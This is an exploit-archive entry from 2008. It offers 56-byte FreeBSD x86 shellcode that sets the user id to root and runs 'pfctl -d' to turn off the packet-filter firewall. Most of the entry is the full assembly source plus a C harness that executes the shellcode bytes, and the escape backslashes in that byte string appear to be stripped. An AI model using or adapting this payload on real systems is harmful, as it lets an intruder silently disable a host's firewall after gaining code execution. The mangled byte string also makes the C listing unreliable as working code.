[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : freebsd/x86 setreuid, execve(pfctl -d) 56 bytes
# Published : 2008-09-12
# Author : suN8Hclf
# Previous Title : linux/x86 setresuid(0,0,0) /bin/sh shellcode 35 bytes
# Next Title : linux/x86 iopl(3); asm(cli); while(1){} 12 bytes
***(C)oDed bY suN8Hclf***
DaRk-CodeRs Group production, kid
[FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes]
The simples way to disable the FreeBSD's packet filter. We do not
flush all rules (pfctl -F all) but only turn the firewall off.
Assembly code:
-------------------------code.asm--------------------------
section .text
global _start
_start:
xor eax, eax
push eax
push eax
mov al, 126
push eax
int 0x80 ; setreuid()
xor eax, eax
push eax
push word 0x642d
mov ecx, esp ; ecx contains a pointer to "-d" string
push eax
push 0x6c746366
push 0x702f6e69
push 0x62732f2f
mov ebx, esp ; ebx contains a pointer to "//sbin/pfctl" string
push eax
push ecx
push ebx
mov ecx, esp
push eax
push ecx
push ebx
mov al, 0x3b
push eax
int 0x80 ; execve()
xor eax, eax
push eax
push eax
int 0x80 ; exit()
-------------------------code.asm--------------------------
And C code:
-------------------------code.c----------------------------
#include <stdio.h>
char shellcode[]=
"x31xc0x50x50xb0x7ex50xcdx80x31xc0x50x66x68x2dx64"
"x89xe1x50x68x66x63x74x6cx68x69x6ex2fx70x68x2fx2f"
"x73x62x89xe3x50x51x53x89xe1x50x51x53xb0x3bx50xcd"
"x80x31xc0x50x50xcdx80";
int main(int argc, char *argv[]){
int (*func)();
func=(int (*)())shellcode;
(int)(*func)();
}
-------------------------code.c----------------------------
Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!,
Katharsis, doctor and many others...
Visit us : www.dark-coders.pl
# www.Syue.com [2008-09-12]